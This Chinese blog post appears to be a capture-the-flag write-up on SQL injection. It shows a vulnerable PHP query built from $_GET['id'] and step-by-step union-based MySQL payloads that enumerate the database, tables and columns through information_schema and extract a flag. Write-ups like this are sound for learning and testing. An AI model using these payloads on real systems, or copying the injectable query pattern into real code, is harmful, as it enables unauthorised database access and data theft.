SQL注入

预备知识:

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。

常见的SQL注入漏洞关键代码如下:

$sql = "SELECT * FROM news WHERE id=";
$sql . = $_GET['id'];
$result = mysql_query($sql);

在这里插入图片描述

首页
在这里插入图片描述
搜索结果
在这里插入图片描述
加单引号报500错误
在这里插入图片描述可以看到报了sql语句错误
在这里插入图片描述看到了 % ,搜索型注入?

在这里插入图片描述
还可以看到用的是mysql数据库,下面好说了直接爆?

1、order by语句测试表中有几列

搜索%' order by 1 #

在这里插入图片描述
显示正常

order by 2的时候报错,
在这里插入图片描述

所以表中只有一列

2、union select 测试显示位

%' union select 1 #

在这里插入图片描述
正常回显

3、union联合查询爆数据库名

搜索%' union select database() #

在这里插入图片描述
4、爆表名

搜索%' union select group_concat(table_name) from information_schema.tables where table_schema='attackdb' #

在这里插入图片描述
5、爆db_news表的列名

0%' union select group_concat(column_name) from information_schema.columns where table_name='db_news' and table_schema='attackdb' #

在这里插入图片描述
看到了flag。。
6、爆flag

0%' union select flag from attackdb.db_news #

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值